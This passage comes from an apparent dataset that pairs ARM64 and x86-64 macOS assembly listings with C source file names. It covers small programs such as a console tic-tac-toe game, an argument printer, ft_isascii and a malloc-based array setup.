ldrsb w9, [x9, #8]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_18
b LBB2_17
LBB2_17:
mov w8, #1
str w8, [sp, #12]
b LBB2_49
LBB2_18:
ldr x8, [sp]
ldrsb w8, [x8]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB2_21
b LBB2_19
LBB2_19:
ldr x8, [sp]
ldrsb w8, [x8, #3]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB2_21
b LBB2_20
LBB2_20:
ldr x8, [sp]
ldrsb w8, [x8, #6]
subs w8, w8, #32
cset w8, eq
tbnz w8, #0, LBB2_24
b LBB2_21
LBB2_21:
ldr x8, [sp]
ldrsb w8, [x8]
ldr x9, [sp]
ldrsb w9, [x9, #3]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_24
b LBB2_22
LBB2_22:
ldr x8, [sp]
ldrsb w8, [x8, #3]
ldr x9, [sp]
ldrsb w9, [x9, #6]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_24
b LBB2_23
LBB2_23:
mov w8, #1
str w8, [sp, #12]
b LBB2_49
LBB2_24:
ldr x8, [sp]
ldrsb w8, [x8, #1]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB2_27
b LBB2_25
LBB2_25:
ldr x8, [sp]
ldrsb w8, [x8, #4]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB2_27
b LBB2_26
LBB2_26:
ldr x8, [sp]
ldrsb w8, [x8, #7]
subs w8, w8, #32
cset w8, eq
tbnz w8, #0, LBB2_30
b LBB2_27
LBB2_27:
ldr x8, [sp]
ldrsb w8, [x8, #1]
ldr x9, [sp]
ldrsb w9, [x9, #4]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_30
b LBB2_28
LBB2_28:
ldr x8, [sp]
ldrsb w8, [x8, #4]
ldr x9, [sp]
ldrsb w9, [x9, #7]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_30
b LBB2_29
LBB2_29:
mov w8, #1
str w8, [sp, #12]
b LBB2_49
LBB2_30:
ldr x8, [sp]
ldrsb w8, [x8, #2]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB2_33
b LBB2_31
LBB2_31:
ldr x8, [sp]
ldrsb w8, [x8, #5]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB2_33
b LBB2_32
LBB2_32:
ldr x8, [sp]
ldrsb w8, [x8, #8]
subs w8, w8, #32
cset w8, eq
tbnz w8, #0, LBB2_36
b LBB2_33
LBB2_33:
ldr x8, [sp]
ldrsb w8, [x8, #2]
ldr x9, [sp]
ldrsb w9, [x9, #5]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_36
b LBB2_34
LBB2_34:
ldr x8, [sp]
ldrsb w8, [x8, #5]
ldr x9, [sp]
ldrsb w9, [x9, #8]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_36
b LBB2_35
LBB2_35:
mov w8, #1
str w8, [sp, #12]
b LBB2_49
LBB2_36:
ldr x8, [sp]
ldrsb w8, [x8]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB2_39
b LBB2_37
LBB2_37:
ldr x8, [sp]
ldrsb w8, [x8, #4]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB2_39
b LBB2_38
LBB2_38:
ldr x8, [sp]
ldrsb w8, [x8, #8]
subs w8, w8, #32
cset w8, eq
tbnz w8, #0, LBB2_42
b LBB2_39
LBB2_39:
ldr x8, [sp]
ldrsb w8, [x8]
ldr x9, [sp]
ldrsb w9, [x9, #4]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_42
b LBB2_40
LBB2_40:
ldr x8, [sp]
ldrsb w8, [x8, #4]
ldr x9, [sp]
ldrsb w9, [x9, #8]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_42
b LBB2_41
LBB2_41:
mov w8, #1
str w8, [sp, #12]
b LBB2_49
LBB2_42:
ldr x8, [sp]
ldrsb w8, [x8, #2]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB2_45
b LBB2_43
LBB2_43:
ldr x8, [sp]
ldrsb w8, [x8, #4]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB2_45
b LBB2_44
LBB2_44:
ldr x8, [sp]
ldrsb w8, [x8, #6]
subs w8, w8, #32
cset w8, eq
tbnz w8, #0, LBB2_48
b LBB2_45
LBB2_45:
ldr x8, [sp]
ldrsb w8, [x8, #2]
ldr x9, [sp]
ldrsb w9, [x9, #4]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_48
b LBB2_46
LBB2_46:
ldr x8, [sp]
ldrsb w8, [x8, #4]
ldr x9, [sp]
ldrsb w9, [x9, #6]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_48
b LBB2_47
LBB2_47:
mov w8, #1
str w8, [sp, #12]
b LBB2_49
LBB2_48:
str wzr, [sp, #12]
b LBB2_49
LBB2_49:
ldr w0, [sp, #12]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.section __TEXT,__const
l___const.main.arr: ; @__const.main.arr
.space 9,32
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "X's turn"
l_.str.1: ; @.str.1
.asciz "\nRow: "
l_.str.2: ; @.str.2
.asciz "%i"
l_.str.3: ; @.str.3
.asciz "Column: "
l_.str.4: ; @.str.4
.asciz "\n(%i, %i)\nOccupied!\n"
l_.str.5: ; @.str.5
.asciz "O's turn"
l_.str.6: ; @.str.6
.asciz "Its a tie!"
l_.str.7: ; @.str.7
.asciz "X wins!"
l_.str.8: ; @.str.8
.asciz "O wins!"
l_.str.9: ; @.str.9
.asciz " %c | %c | %c \n"
l_.str.10: ; @.str.10
.asciz "---+---+---\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -24(%rbp)
movq l___const.main.arr(%rip), %rax
movq %rax, -17(%rbp)
movb l___const.main.arr+8(%rip), %al
movb %al, -9(%rbp)
movl $0, -28(%rbp)
movl $1, -36(%rbp)
leaq -17(%rbp), %rdi
callq _board
movl $0, -48(%rbp)
LBB0_1: ## =>This Loop Header: Depth=1
## Child Loop BB0_4 Depth 2
## Child Loop BB0_9 Depth 2
## Child Loop BB0_21 Depth 2
## Child Loop BB0_26 Depth 2
cmpl $9, -48(%rbp)
jge LBB0_39
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
cmpl $1, -36(%rbp)
jne LBB0_20
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
LBB0_4: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.2(%rip), %rdi
leaq -40(%rbp), %rsi
movb $0, %al
callq _scanf
## %bb.5: ## in Loop: Header=BB0_4 Depth=2
movb $1, %al
cmpl $0, -40(%rbp)
movb %al, -49(%rbp) ## 1-byte Spill
jl LBB0_7
## %bb.6: ## in Loop: Header=BB0_4 Depth=2
cmpl $3, -40(%rbp)
setg %al
movb %al, -49(%rbp) ## 1-byte Spill
LBB0_7: ## in Loop: Header=BB0_4 Depth=2
movb -49(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB0_4
## %bb.8: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_9
LBB0_9: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.2(%rip), %rdi
leaq -44(%rbp), %rsi
movb $0, %al
callq _scanf
## %bb.10: ## in Loop: Header=BB0_9 Depth=2
movb $1, %al
cmpl $0, -44(%rbp)
movb %al, -50(%rbp) ## 1-byte Spill
jl LBB0_12
## %bb.11: ## in Loop: Header=BB0_9 Depth=2
cmpl $3, -44(%rbp)
setg %al
movb %al, -50(%rbp) ## 1-byte Spill
LBB0_12: ## in Loop: Header=BB0_9 Depth=2
movb -50(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB0_9
## %bb.13: ## in Loop: Header=BB0_1 Depth=1
movl -40(%rbp), %eax
subl $1, %eax
movslq %eax, %rcx
leaq -17(%rbp), %rax
imulq $3, %rcx, %rcx
addq %rcx, %rax
movl -44(%rbp), %ecx
subl $1, %ecx
movslq %ecx, %rcx
movsbl (%rax,%rcx), %eax
cmpl $88, %eax
je LBB0_15
## %bb.14: ## in Loop: Header=BB0_1 Depth=1
movl -40(%rbp), %eax
subl $1, %eax
movslq %eax, %rcx
leaq -17(%rbp), %rax
imulq $3, %rcx, %rcx
addq %rcx, %rax
movl -44(%rbp), %ecx
subl $1, %ecx
movslq %ecx, %rcx
movsbl (%rax,%rcx), %eax
cmpl $79, %eax
jne LBB0_16
LBB0_15: ## in Loop: Header=BB0_1 Depth=1
movl -48(%rbp), %eax
subl $1, %eax
movl %eax, -48(%rbp)
movl -40(%rbp), %esi
subl $1, %esi
movl -44(%rbp), %edx
subl $1, %edx
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB0_17
LBB0_16: ## in Loop: Header=BB0_1 Depth=1
movl -40(%rbp), %eax
subl $1, %eax
movslq %eax, %rcx
leaq -17(%rbp), %rax
imulq $3, %rcx, %rcx
addq %rcx, %rax
movl -44(%rbp), %ecx
subl $1, %ecx
movslq %ecx, %rcx
movb $88, (%rax,%rcx)
movl $0, -36(%rbp)
LBB0_17: ## in Loop: Header=BB0_1 Depth=1
leaq -17(%rbp), %rdi
callq _board
leaq -17(%rbp), %rdi
callq _checkWin
cmpl $1, %eax
jne LBB0_19
## %bb.18: ## in Loop: Header=BB0_1 Depth=1
movl $1, -28(%rbp)
movl $10, -48(%rbp)
LBB0_19: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_37
LBB0_20: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str.5(%rip), %rdi
movb $0, %al
callq _printf
LBB0_21: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.2(%rip), %rdi
leaq -40(%rbp), %rsi
movb $0, %al
callq _scanf
## %bb.22: ## in Loop: Header=BB0_21 Depth=2
movb $1, %al
cmpl $0, -40(%rbp)
movb %al, -51(%rbp) ## 1-byte Spill
jl LBB0_24
## %bb.23: ## in Loop: Header=BB0_21 Depth=2
cmpl $3, -40(%rbp)
setg %al
movb %al, -51(%rbp) ## 1-byte Spill
LBB0_24: ## in Loop: Header=BB0_21 Depth=2
movb -51(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB0_21
## %bb.25: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_26
LBB0_26: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.2(%rip), %rdi
leaq -44(%rbp), %rsi
movb $0, %al
callq _scanf
## %bb.27: ## in Loop: Header=BB0_26 Depth=2
movb $1, %al
cmpl $0, -44(%rbp)
movb %al, -52(%rbp) ## 1-byte Spill
jl LBB0_29
## %bb.28: ## in Loop: Header=BB0_26 Depth=2
cmpl $3, -44(%rbp)
setg %al
movb %al, -52(%rbp) ## 1-byte Spill
LBB0_29: ## in Loop: Header=BB0_26 Depth=2
movb -52(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB0_26
## %bb.30: ## in Loop: Header=BB0_1 Depth=1
movl -40(%rbp), %eax
subl $1, %eax
movslq %eax, %rcx
leaq -17(%rbp), %rax
imulq $3, %rcx, %rcx
addq %rcx, %rax
movl -44(%rbp), %ecx
subl $1, %ecx
movslq %ecx, %rcx
movsbl (%rax,%rcx), %eax
cmpl $88, %eax
je LBB0_32
## %bb.31: ## in Loop: Header=BB0_1 Depth=1
movl -40(%rbp), %eax
subl $1, %eax
movslq %eax, %rcx
leaq -17(%rbp), %rax
imulq $3, %rcx, %rcx
addq %rcx, %rax
movl -44(%rbp), %ecx
subl $1, %ecx
movslq %ecx, %rcx
movsbl (%rax,%rcx), %eax
cmpl $79, %eax
jne LBB0_33
LBB0_32: ## in Loop: Header=BB0_1 Depth=1
movl -48(%rbp), %eax
subl $1, %eax
movl %eax, -48(%rbp)
movl -40(%rbp), %esi
subl $1, %esi
movl -44(%rbp), %edx
subl $1, %edx
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB0_34
LBB0_33: ## in Loop: Header=BB0_1 Depth=1
movl -40(%rbp), %eax
subl $1, %eax
movslq %eax, %rcx
leaq -17(%rbp), %rax
imulq $3, %rcx, %rcx
addq %rcx, %rax
movl -44(%rbp), %ecx
subl $1, %ecx
movslq %ecx, %rcx
movb $79, (%rax,%rcx)
movl $1, -36(%rbp)
LBB0_34: ## in Loop: Header=BB0_1 Depth=1
leaq -17(%rbp), %rdi
callq _board
leaq -17(%rbp), %rdi
callq _checkWin
cmpl $1, %eax
jne LBB0_36
## %bb.35: ## in Loop: Header=BB0_1 Depth=1
movl $2, -28(%rbp)
movl $10, -48(%rbp)
LBB0_36: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_37
LBB0_37: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_38
LBB0_38: ## in Loop: Header=BB0_1 Depth=1
movl -48(%rbp), %eax
addl $1, %eax
movl %eax, -48(%rbp)
jmp LBB0_1
LBB0_39:
cmpl $9, -48(%rbp)
jne LBB0_42
## %bb.40:
cmpl $0, -28(%rbp)
jne LBB0_42
## %bb.41:
leaq L_.str.6(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB0_48
LBB0_42:
cmpl $1, -28(%rbp)
jne LBB0_44
## %bb.43:
leaq L_.str.7(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB0_47
LBB0_44:
cmpl $2, -28(%rbp)
jne LBB0_46
## %bb.45:
leaq L_.str.8(%rip), %rdi
movb $0, %al
callq _printf
LBB0_46:
jmp LBB0_47
LBB0_47:
jmp LBB0_48
LBB0_48:
movl -24(%rbp), %eax
movl %eax, -56(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_50
## %bb.49:
movl -56(%rbp), %eax ## 4-byte Reload
addq $64, %rsp
popq %rbp
retq
LBB0_50:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.globl _board ## -- Begin function board
.p2align 4, 0x90
_board: ## @board
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rax
movsbl (%rax), %esi
movq -8(%rbp), %rax
movsbl 1(%rax), %edx
movq -8(%rbp), %rax
movsbl 2(%rax), %ecx
leaq L_.str.9(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.10(%rip), %rdi
movb $0, %al
callq _printf
movq -8(%rbp), %rax
movsbl 3(%rax), %esi
movq -8(%rbp), %rax
movsbl 4(%rax), %edx
movq -8(%rbp), %rax
movsbl 5(%rax), %ecx
leaq L_.str.9(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.10(%rip), %rdi
movb $0, %al
callq _printf
movq -8(%rbp), %rax
movsbl 6(%rax), %esi
movq -8(%rbp), %rax
movsbl 7(%rax), %edx
movq -8(%rbp), %rax
movsbl 8(%rax), %ecx
leaq L_.str.9(%rip), %rdi
movb $0, %al
callq _printf
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _checkWin ## -- Begin function checkWin
.p2align 4, 0x90
_checkWin: ## @checkWin
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -16(%rbp)
movq -16(%rbp), %rax
movsbl (%rax), %eax
cmpl $32, %eax
jne LBB2_3
## %bb.1:
movq -16(%rbp), %rax
movsbl 1(%rax), %eax
cmpl $32, %eax
jne LBB2_3
## %bb.2:
movq -16(%rbp), %rax
movsbl 2(%rax), %eax
cmpl $32, %eax
je LBB2_6
LBB2_3:
movq -16(%rbp), %rax
movsbl (%rax), %eax
movq -16(%rbp), %rcx
movsbl 1(%rcx), %ecx
cmpl %ecx, %eax
jne LBB2_6
## %bb.4:
movq -16(%rbp), %rax
movsbl 1(%rax), %eax
movq -16(%rbp), %rcx
movsbl 2(%rcx), %ecx
cmpl %ecx, %eax
jne LBB2_6
## %bb.5:
movl $1, -4(%rbp)
jmp LBB2_49
LBB2_6:
movq -16(%rbp), %rax
movsbl 3(%rax), %eax
cmpl $32, %eax
jne LBB2_9
## %bb.7:
movq -16(%rbp), %rax
movsbl 4(%rax), %eax
cmpl $32, %eax
jne LBB2_9
## %bb.8:
movq -16(%rbp), %rax
movsbl 5(%rax), %eax
cmpl $32, %eax
je LBB2_12
LBB2_9:
movq -16(%rbp), %rax
movsbl 3(%rax), %eax
movq -16(%rbp), %rcx
movsbl 4(%rcx), %ecx
cmpl %ecx, %eax
jne LBB2_12
## %bb.10:
movq -16(%rbp), %rax
movsbl 4(%rax), %eax
movq -16(%rbp), %rcx
movsbl 5(%rcx), %ecx
cmpl %ecx, %eax
jne LBB2_12
## %bb.11:
movl $1, -4(%rbp)
jmp LBB2_49
LBB2_12:
movq -16(%rbp), %rax
movsbl 6(%rax), %eax
cmpl $32, %eax
jne LBB2_15
## %bb.13:
movq -16(%rbp), %rax
movsbl 7(%rax), %eax
cmpl $32, %eax
jne LBB2_15
## %bb.14:
movq -16(%rbp), %rax
movsbl 8(%rax), %eax
cmpl $32, %eax
je LBB2_18
LBB2_15:
movq -16(%rbp), %rax
movsbl 6(%rax), %eax
movq -16(%rbp), %rcx
movsbl 7(%rcx), %ecx
cmpl %ecx, %eax
jne LBB2_18
## %bb.16:
movq -16(%rbp), %rax
movsbl 7(%rax), %eax
movq -16(%rbp), %rcx
movsbl 8(%rcx), %ecx
cmpl %ecx, %eax
jne LBB2_18
## %bb.17:
movl $1, -4(%rbp)
jmp LBB2_49
LBB2_18:
movq -16(%rbp), %rax
movsbl (%rax), %eax
cmpl $32, %eax
jne LBB2_21
## %bb.19:
movq -16(%rbp), %rax
movsbl 3(%rax), %eax
cmpl $32, %eax
jne LBB2_21
## %bb.20:
movq -16(%rbp), %rax
movsbl 6(%rax), %eax
cmpl $32, %eax
je LBB2_24
LBB2_21:
movq -16(%rbp), %rax
movsbl (%rax), %eax
movq -16(%rbp), %rcx
movsbl 3(%rcx), %ecx
cmpl %ecx, %eax
jne LBB2_24
## %bb.22:
movq -16(%rbp), %rax
movsbl 3(%rax), %eax
movq -16(%rbp), %rcx
movsbl 6(%rcx), %ecx
cmpl %ecx, %eax
jne LBB2_24
## %bb.23:
movl $1, -4(%rbp)
jmp LBB2_49
LBB2_24:
movq -16(%rbp), %rax
movsbl 1(%rax), %eax
cmpl $32, %eax
jne LBB2_27
## %bb.25:
movq -16(%rbp), %rax
movsbl 4(%rax), %eax
cmpl $32, %eax
jne LBB2_27
## %bb.26:
movq -16(%rbp), %rax
movsbl 7(%rax), %eax
cmpl $32, %eax
je LBB2_30
LBB2_27:
movq -16(%rbp), %rax
movsbl 1(%rax), %eax
movq -16(%rbp), %rcx
movsbl 4(%rcx), %ecx
cmpl %ecx, %eax
jne LBB2_30
## %bb.28:
movq -16(%rbp), %rax
movsbl 4(%rax), %eax
movq -16(%rbp), %rcx
movsbl 7(%rcx), %ecx
cmpl %ecx, %eax
jne LBB2_30
## %bb.29:
movl $1, -4(%rbp)
jmp LBB2_49
LBB2_30:
movq -16(%rbp), %rax
movsbl 2(%rax), %eax
cmpl $32, %eax
jne LBB2_33
## %bb.31:
movq -16(%rbp), %rax
movsbl 5(%rax), %eax
cmpl $32, %eax
jne LBB2_33
## %bb.32:
movq -16(%rbp), %rax
movsbl 8(%rax), %eax
cmpl $32, %eax
je LBB2_36
LBB2_33:
movq -16(%rbp), %rax
movsbl 2(%rax), %eax
movq -16(%rbp), %rcx
movsbl 5(%rcx), %ecx
cmpl %ecx, %eax
jne LBB2_36
## %bb.34:
movq -16(%rbp), %rax
movsbl 5(%rax), %eax
movq -16(%rbp), %rcx
movsbl 8(%rcx), %ecx
cmpl %ecx, %eax
jne LBB2_36
## %bb.35:
movl $1, -4(%rbp)
jmp LBB2_49
LBB2_36:
movq -16(%rbp), %rax
movsbl (%rax), %eax
cmpl $32, %eax
jne LBB2_39
## %bb.37:
movq -16(%rbp), %rax
movsbl 4(%rax), %eax
cmpl $32, %eax
jne LBB2_39
## %bb.38:
movq -16(%rbp), %rax
movsbl 8(%rax), %eax
cmpl $32, %eax
je LBB2_42
LBB2_39:
movq -16(%rbp), %rax
movsbl (%rax), %eax
movq -16(%rbp), %rcx
movsbl 4(%rcx), %ecx
cmpl %ecx, %eax
jne LBB2_42
## %bb.40:
movq -16(%rbp), %rax
movsbl 4(%rax), %eax
movq -16(%rbp), %rcx
movsbl 8(%rcx), %ecx
cmpl %ecx, %eax
jne LBB2_42
## %bb.41:
movl $1, -4(%rbp)
jmp LBB2_49
LBB2_42:
movq -16(%rbp), %rax
movsbl 2(%rax), %eax
cmpl $32, %eax
jne LBB2_45
## %bb.43:
movq -16(%rbp), %rax
movsbl 4(%rax), %eax
cmpl $32, %eax
jne LBB2_45
## %bb.44:
movq -16(%rbp), %rax
movsbl 6(%rax), %eax
cmpl $32, %eax
je LBB2_48
LBB2_45:
movq -16(%rbp), %rax
movsbl 2(%rax), %eax
movq -16(%rbp), %rcx
movsbl 4(%rcx), %ecx
cmpl %ecx, %eax
jne LBB2_48
## %bb.46:
movq -16(%rbp), %rax
movsbl 4(%rax), %eax
movq -16(%rbp), %rcx
movsbl 6(%rcx), %ecx
cmpl %ecx, %eax
jne LBB2_48
## %bb.47:
movl $1, -4(%rbp)
jmp LBB2_49
LBB2_48:
movl $0, -4(%rbp)
LBB2_49:
movl -4(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__const
l___const.main.arr: ## @__const.main.arr
.space 9,32
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "X's turn"
L_.str.1: ## @.str.1
.asciz "\nRow: "
L_.str.2: ## @.str.2
.asciz "%i"
L_.str.3: ## @.str.3
.asciz "Column: "
L_.str.4: ## @.str.4
.asciz "\n(%i, %i)\nOccupied!\n"
L_.str.5: ## @.str.5
.asciz "O's turn"
L_.str.6: ## @.str.6
.asciz "Its a tie!"
L_.str.7: ## @.str.7
.asciz "X wins!"
L_.str.8: ## @.str.8
.asciz "O wins!"
L_.str.9: ## @.str.9
.asciz " %c | %c | %c \n"
L_.str.10: ## @.str.10
.asciz "---+---+---\n"
.subsections_via_symbols
| the_stack_data/661492.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _foo ; -- Begin function foo
.p2align 2
_foo: ; @foo
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
ldr w0, [sp, #12]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _foo ## -- Begin function foo
.p2align 4, 0x90
_foo: ## @foo
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl -4(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/12188.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
stur w0, [x29, #-8]
str x1, [sp, #16]
ldur w8, [x29, #-8]
subs w8, w8, #1
str w8, [sp, #12]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #12]
subs w8, w8, #0
cset w8, le
tbnz w8, #0, LBB0_4
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #16]
ldrsw x9, [sp, #12]
ldr x8, [x8, x9, lsl #3]
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #12]
subs w8, w8, #1
str w8, [sp, #12]
b LBB0_1
LBB0_4:
mov w0, #0
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%s "
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
movl %edi, -8(%rbp)
movq %rsi, -16(%rbp)
movl -8(%rbp), %eax
subl $1, %eax
movl %eax, -20(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
cmpl $0, -20(%rbp)
jle LBB0_4
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movq -16(%rbp), %rax
movslq -20(%rbp), %rcx
movq (%rax,%rcx,8), %rsi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movl -20(%rbp), %eax
addl $-1, %eax
movl %eax, -20(%rbp)
jmp LBB0_1
LBB0_4:
xorl %eax, %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%s "
.subsections_via_symbols
| the_stack_data/1074272.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _ft_isascii ; -- Begin function ft_isascii
.p2align 2
_ft_isascii: ; @ft_isascii
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str w0, [sp, #8]
ldr w8, [sp, #8]
subs w8, w8, #0
cset w8, lt
tbnz w8, #0, LBB0_3
b LBB0_1
LBB0_1:
ldr w8, [sp, #8]
subs w8, w8, #127
cset w8, gt
tbnz w8, #0, LBB0_3
b LBB0_2
LBB0_2:
mov w8, #1
str w8, [sp, #12]
b LBB0_4
LBB0_3:
str wzr, [sp, #12]
b LBB0_4
LBB0_4:
ldr w0, [sp, #12]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _ft_isascii ## -- Begin function ft_isascii
.p2align 4, 0x90
_ft_isascii: ## @ft_isascii
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl %edi, -8(%rbp)
cmpl $0, -8(%rbp)
jl LBB0_3
## %bb.1:
cmpl $127, -8(%rbp)
jg LBB0_3
## %bb.2:
movl $1, -4(%rbp)
jmp LBB0_4
LBB0_3:
movl $0, -4(%rbp)
LBB0_4:
movl -4(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/753601.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
mov x0, #24
bl _malloc
str x0, [sp, #8]
mov x0, #4
bl _malloc
ldr x8, [sp, #8]
str x0, [x8]
mov x0, #8
bl _malloc
ldr x8, [sp, #8]
str x0, [x8, #8]
mov x0, #12
bl _malloc
ldr x8, [sp, #8]
str x0, [x8, #16]
ldr x8, [sp, #8]
ldr x9, [x8]
mov w8, #1
str w8, [x9]
ldr x9, [sp, #8]
ldr x9, [x9, #8]
str w8, [x9]
ldr x9, [sp, #8]
ldr x9, [x9, #8]
str w8, [x9, #4]
ldr x9, [sp, #8]
ldr x9, [x9, #16]
str w8, [x9]
ldr x9, [sp, #8]
ldr x10, [x9, #16]
mov w9, #2
str w9, [x10, #4]
ldr x9, [sp, #8]
ldr x9, [x9, #16]
str w8, [x9, #8]
stur wzr, [x29, #-8]
b LBB0_1
LBB0_1: ; =>This Loop Header: Depth=1
